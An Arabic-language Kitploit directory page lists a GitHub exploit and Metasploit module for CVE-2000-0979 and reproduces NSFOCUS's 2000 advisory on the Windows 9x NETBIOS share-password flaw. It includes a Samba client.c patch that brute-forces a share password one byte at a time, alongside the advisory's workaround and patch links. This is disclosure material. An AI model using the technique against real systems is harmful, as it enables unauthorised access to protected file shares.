Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2000-0979 — CVE-2000-0979 | Kitploit
أدوات/GitHubGitHub/z6543/cve-2000-0979
أطر الاستغلالتحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراق
GitHubz6543/cve-2000-0979

CVE-2000-0979

CVE-2000-0979

عرض المستودع
22منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2000-0979

CVE-2000-0979.rb هي الأداة المستقلة لاستغلال CVE-2000-0979 ضد خدمة SMB في ويندوز 95.

msf_2000_0979.rb هو وحدة Metasploit. يمكنك نسخ هذا إلى ⁨metasploit-framework⁩ ▸ ⁨modules⁩ ▸ ⁨auxiliary⁩ ▸ scanner⁩ ▸ ⁨smb⁩

MSF module

المزيد من الوثائق قريبًا!

الإعلان الأصلي

استشارة أمنية من NSFOCUS (SA2000-05)

الموضوع: ثغرة في التحقق من كلمة مرور NETBIOS في ويندوز 9x من مايكروسوفت

تاريخ الإصدار: 24 أغسطس 2000 تاريخ التحديث: 11 أكتوبر 2000

الأنظمة المتأثرة

  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows 98 Second Edition
  • Microsoft Windows Me

الأنظمة غير المتأثرة

  • Microsoft Windows NT 4.0
  • Microsoft Windows 2000

التأثير

توجد ثغرة في مخطط التحقق من كلمة المرور المستخدم في تنفيذ بروتوكول NETBIOS في ويندوز 9x من مايكروسوفت. تسمح هذه الثغرة لأي مستخدم بالوصول إلى خدمة مشاركة الملفات المحمية بكلمة مرور في ويندوز 9x. لا يحتاج المهاجم إلى معرفة كلمة مرور المشاركة.

الوصف

يمكنك تعيين كلمة مرور لحماية الموارد المشتركة في نظام ويندوز 9x من مايكروسوفت. لكن توجد ثغرة في مخطط التحقق من كلمة المرور المستخدم في تنفيذ بروتوكول NETBIOS في ويندوز 9x من مايكروسوفت. للتحقق من كلمة المرور، يعتمد طول كلمة المرور على طول البيانات المرسلة من العميل إلى الخادم. أي، إذا قام العميل بتعيين طول كلمة المرور إلى بايت واحد وأرسل الحزمة مع كلمة المرور بنص عادي إلى الخادم، فسيقارنها الخادم فقط بالبايت الأول من كلمة المرور المشتركة (نص عادي)، وإذا تطابقت، تكتمل عملية التحقق. كل ما يحتاجه المهاجم هو تخمين ومحاولة البايت الأول من كلمة المرور في الضحية. نظام الإدارة عن بُعد في ويندوز 9x متأثر أيضًا لأنه يستخدم نفس طريقة التحقق من كلمة مرور المشاركة.

الاستغلال

هذا مثال بسيط لتوضيح هذه الثغرة. احصل على حزمة samba المصدرية وقم بتعديل source/client/client.c كالتالي:

root@kitploit:~

--- samba-2.0.6.orig/source/client/client.c     Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c  Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

        DEBUG(4,(" session setup ok\n"));

+/*
        if (!cli_send_tconX(c, share, "?????",
                            password, strlen(password)+1)) {
                DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
                cli_shutdown(c);
                return NULL;
        }
+*/
+
+        password[0] = 0;
+        c->sec_mode = 0;
+        do{
+
+          password[0]+=1;
+
+        }while(!cli_send_tconX(c, share, "?????", password, 1));

        DEBUG(4,(" tconx ok\n"));

الحل البديل

أغلق خدمة مشاركة الملفات والطابعات في Microsoft.

الحل

تم إبلاغ Microsoft وأصدرت نشرة أمنية واحدة بخصوص هذا الخلل.

النشرة متاحة على:

http://www.microsoft.com/technet/security/bulletin/MS00-072.asp

التصحيحات متاحة على:

. Microsoft Windows 95

التصحيح متاح قريبًا

. Microsoft Windows 98 و 98 Second Edition

http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE

. Microsoft Windows Me

http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE

إخلاء المسؤولية

المعلومات المقدمة تُنشر من قبل NSFOCUS "كما هي" دون أي ضمان من أي نوع. تخلو NSFOCUS من جميع الضمانات، سواء كانت صريحة أو ضمنية، باستثناء ضمانات القابلية للتسويق. لا تتحمل NSFOCUS تحت أي ظرف من الظروف المسؤولية عن أي أضرار مهما كانت بما في ذلك الأضرار المباشرة، غير المباشرة، العرضية، التبعية، فقدان أرباح الأعمال أو الأضرار الخاصة، حتى لو تم إبلاغ NSFOCUS بإمكانية حدوث مثل هذه الأضرار. يُسمح بتوزيع أو إعادة إنتاج المعلومات بشرط عدم تعديل الاستشارة بأي شكل من الأشكال.

?Copyright 1999-2000 NSFOCUS. جميع الحقوق محفوظة. شروط الاستخدام.

فريق الأمن NSFOCUS [email protected] شركة NSFOCUS لتكنولوجيا المعلومات المحدودة (http://www.nsfocus.com)

تنزيل الأداة